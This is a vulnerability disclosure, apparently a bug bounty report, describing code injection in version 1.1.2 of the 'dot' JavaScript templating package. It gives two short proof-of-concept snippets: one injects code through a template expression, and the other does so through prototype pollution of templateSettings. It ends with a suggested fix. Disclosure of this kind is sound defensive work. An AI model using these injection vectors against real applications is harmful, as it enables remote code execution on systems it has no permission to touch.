I would like to report a code injection vulnerability in dot.
It allows attackers to execute arbitrary JS code, especially when combined with a prototype pollution attack.
module name: dotversion:1.1.2npm page: https://www.npmjs.com/package/dot
Created in search of the fastest and concise JavaScript templating function with emphasis on performance under V8 and nodejs. It shows great performance for both nodejs and browsers.
doT.js is fast, small and has no dependencies.
76,838 downloads in the last week
dot uses Function() to compile templates. this can be exploited by the attacker if she can control the template or if she can control the value set on Object.prototype.
a) The basic attack vector
var doT = require("dot");
var tempFn = doT.template("<h1>Here is a sample template " +
"{{=console.log(23)}}</h1>");
tempFn({})
b) in combination with a prototype pollution attack
<h1>Here is a sample template</h1>
var doT = require("dot");
// prototype pollution attack vector
Object.prototype.templateSettings = {varname:"a,b,c,d,x=console.log(25)"};
// benign looking template compilation + application
var dots = require("dot").process({path: "./resources"});
dots.mytemplate();
Even though the template compilation + application looks safe, due to the prototype pollution, the attacker can execute arbitrary commands.
N/A remove Function() call
The attacker can achieve code injection/RCE if she can control the template or if she can set arbitrary properties on Object.prototype. Using Function() with runtime computed values is rarely safe.